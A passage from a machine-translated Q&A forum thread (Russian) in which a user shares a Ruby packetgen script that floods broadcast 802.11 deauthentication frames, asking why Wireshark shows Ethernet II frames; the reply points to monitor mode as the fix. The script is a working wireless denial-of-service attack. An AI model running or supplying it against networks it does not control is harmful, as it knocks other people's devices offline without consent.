Кадры Deauth отображаются как кадры Ethernet II под wirshark

332
Practical1

Я пытаюсь написать простой сценарий атаки по умолчанию, но когда я запускаю wireshark вместо кадров по умолчанию, я вижу только кадры Ethernet II; кроме того, кадры не влияют ни на одно из устройств моей сети. Это потому, что я использую wireshark в случайном режиме, или это проблема моей конфигурации сети или моего скрипта. Код ниже и скриншот в ссылке на подобный вопрос, я спросил на переполнение стека здесь .

require 'packetgen'  def deauth() network = 'wlp2s0' yes = 'y' no = 'n' broadcast = 'FF:FF:FF:FF:FF:FF' print 'Do you want to deauth network?[y/n]' input = gets.chomp if input == yes or yes.upcase! puts 'Deauthing all network clients...' while true PacketGen.gen('Dot11::Management', mac1: broadcast). add('Dot11::DeAuth'). to_w(network) end elsif input == no or no.upcase! print 'Okay :(' end end deauth() 
0

1 ответ на вопрос

0
Spiff

Убедитесь, что вы вводите пакеты в интерфейс, который находится в режиме мониторинга 802.11. В противном случае интерфейс будет предполагать, что вы вводите пакеты проводной сети 802.3, и обрабатывает их так.

Огромное спасибо за ответ! Practical1 5 лет назад 0
Если это в конечном итоге решит вашу проблему, нажмите галочку рядом с этим ответом, чтобы пометить ее как решенную. Spiff 5 лет назад 0

Похожие вопросы